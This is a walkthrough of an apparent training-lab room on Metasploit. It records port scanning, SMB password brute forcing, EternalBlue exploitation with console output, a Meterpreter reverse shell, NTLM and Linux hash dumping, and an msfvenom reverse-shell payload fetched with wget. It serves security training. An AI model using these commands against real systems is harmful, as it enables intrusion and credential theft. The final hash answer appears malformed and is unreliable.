Note:
- The questions are shortened for a cleaner view
- Questions that are straightforward will only have answers attached. Such questions can be easily answered by reading the documentation given in the room.
Task 1 - Introduction#
No answer needed
Task 2 - Scanning#
1) How many ports are open on the target system?#
We can perform a quick nmap scan for this.
nmap -sS 10.48.148.151
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8000/tcp open http-alt
Ans: 5
2) Using the relevant scanner, what NetBIOS name can you see?#
We can run a udep_sweep scan for this
setg RHOSTS 10.48.148.151
search udp_sweep
use 0
run
Discovered NetBIOS on 10.48.148.151:137 (__MSBROWSE__:<01>:G ::<00>:U ::<03>:U ::<20>:U :ACME IT SUPPORT:<00>:G :ACME IT SUPPORT:<1d>:U :ACME IT SUPPORT:<1e>:G :00:00:00:00:00:00)
Ans: ACME IT SUPPORT
3) What is running on port 8000?#
Okay, we know for a fact that this is a web server from our nmap scans. We can try searching for the specific server version
search http_version
use 0
set RPORT 8000
run
10.48.148.151:8000 webfs/1.21 ( 403-Forbidden )
Ans: webfs/1.21
4) What is the “penny” user’s SMB password?#
Since I’m using the attackbox. I already have the wordlist in my default wordlist directory. For this, we can use the. smb_login module - It requires a bit of searching around to find.
set SMBUSER penny
set PASS_FILE /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
show info
Name: SMB Login Check Scanner
Module: auxiliary/scanner/smb/smb_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
tebo <tebo@attackresearch.com>
Ben Campbell <eat_meatballs@hotmail.co.uk>
Brandon McCann "zeknox" <bmccann@accuvant.com>
Tom Sellers <tom@fadedcode.net>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is
detected
ANONYMOUS_LOGIN false yes Attempt to login with a blank username a
nd password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CreateSession false no Create a new session for every successfu
l login
DB_ALL_CREDS false no Try each user/password couple stored in
the current database
DB_ALL_PASS false no Add all passwords in the current databas
e to the list
DB_ALL_USERS false no Add all users in the current database to
the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the
current database (Accepted: none, user,
user&realm)
DETECT_ANY_AUTH false no Enable detection of systems accepting an
y authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the spe
cified user
PASS_FILE /usr/share/wordlists/Met no File containing passwords, one per line
asploitRoom/MetasploitWo
rdlist.txt
PRESERVE_DOMAINS true no Respect a username that contains a domai
n name.
Proxies no A proxy chain of format type:host:port[,
type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to
the database
RHOSTS 10.48.148.151 yes The target host(s), see https://docs.met
asploit.com/docs/using-metasploit/basics
/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentica
tion
SMBPass no The password for the specified username
SMBUser penny no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works fo
r a host
THREADS 1 yes The number of concurrent threads (max on
e per host)
USERPASS_FILE no File containing users and passwords sepa
rated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all
users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Description:
This module will test a SMB login on a range of machines and
report successful logins. If you have loaded a database plugin
and connected to a database this module will record successful
logins and hosts so you can track your access.
References:
https://nvd.nist.gov/vuln/detail/CVE-1999-0506
View the full module info with the info -d command.
I’ve given the info output for convenience
run
Ans: leo1234
Task 3 - The Metasploit Databsse#
No answer needed
Task 4 - Vulnerability Scanning#
1) Who wrote the module that checks SMTP servers for open relay?#
We can search around using the key words.
search smtp open relay
use 0
show info
Provided by:
Campbell Murray
xistence <xistence@0x90.nl>
Ans: Campbell Murray
Task 5 - Exploitation#
1) Exploit one of the critical vulnerabilities on the target VM#
No answer needed
2) What is the content of the flag.txt file?#
The vulnerability is ETERNAL BLUE as that is what the entire task is about. We can essentially follow the same steps in the task to exploit this.
Do not forget to start the new machine and change your RHOSTS IP.
search MS17
use 0
set RHOSTS 10.48.144.53
exploit
exploit
[*] Started reverse TCP handler on 10.48.68.45:4444
[*] 10.48.144.53:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.48.144.53:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.48.144.53:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.48.144.53:445 - The target is vulnerable.
[*] 10.48.144.53:445 - Connecting to target for exploitation.
[+] 10.48.144.53:445 - Connection established for exploitation.
[+] 10.48.144.53:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.48.144.53:445 - CORE raw buffer dump (42 bytes)
[*] 10.48.144.53:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.48.144.53:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.48.144.53:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.48.144.53:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.48.144.53:445 - Trying exploit with 12 Groom Allocations.
[*] 10.48.144.53:445 - Sending all but last fragment of exploit packet
[*] 10.48.144.53:445 - Starting non-paged pool grooming
[+] 10.48.144.53:445 - Sending SMBv2 buffers
[+] 10.48.144.53:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.48.144.53:445 - Sending final SMBv2 buffers.
[*] 10.48.144.53:445 - Sending last fragment of exploit packet!
[*] 10.48.144.53:445 - Receiving response from exploit packet
[+] 10.48.144.53:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.48.144.53:445 - Sending egg to corrupted connection.
[*] 10.48.144.53:445 - Triggering free of corrupted buffer.
[*] Sending stage (203846 bytes) to 10.48.144.53
[*] Meterpreter session 2 opened (10.48.68.45:4444 -> 10.48.144.53:49163) at 2025-11-01 06:14:19 +0000
[+] 10.48.144.53:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.48.144.53:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.48.144.53:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Since we did not specify the payload it used meterpreter reverse tcp as the default which gives us access to the shell.
We can search for the flag by:
search -f flag.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Jon\Documents\flag.txt 15 2021-07-15 03:39:25 +0100
cat /Users/Jon/Documents/flag.txt
Ans: THM-5455554845
3) What is the NTLM hash of the password of the user “pirate”?#
we can use hashdump to achieve this
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::
Ans: 8ce9a3ebd1647fcc5e04025019f4b875
Task 6 - Msfvenom#
6) What is the other user’s password hash?#
Follow the task instructions.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.48.81.220 LPORT=7777 -f elf > rev_shell.elf
python3 -m http.server 9000
ssh murphy@10.48.177.203
sudo su
wget http://10.48.117.203:9000/rev_shell.elf
chmod +x rev_shell.elf
In msfconsole terminal:
use multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 10.48.81.220
set LPORT 7777
Once we get access to the shell we can try to find the hashes. The hashdump equivalent for linux is a module called post/linux/gather/hashdump
First we can background the console
use post/linux/gather/hashdump
set session 1
run
Ans:
SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
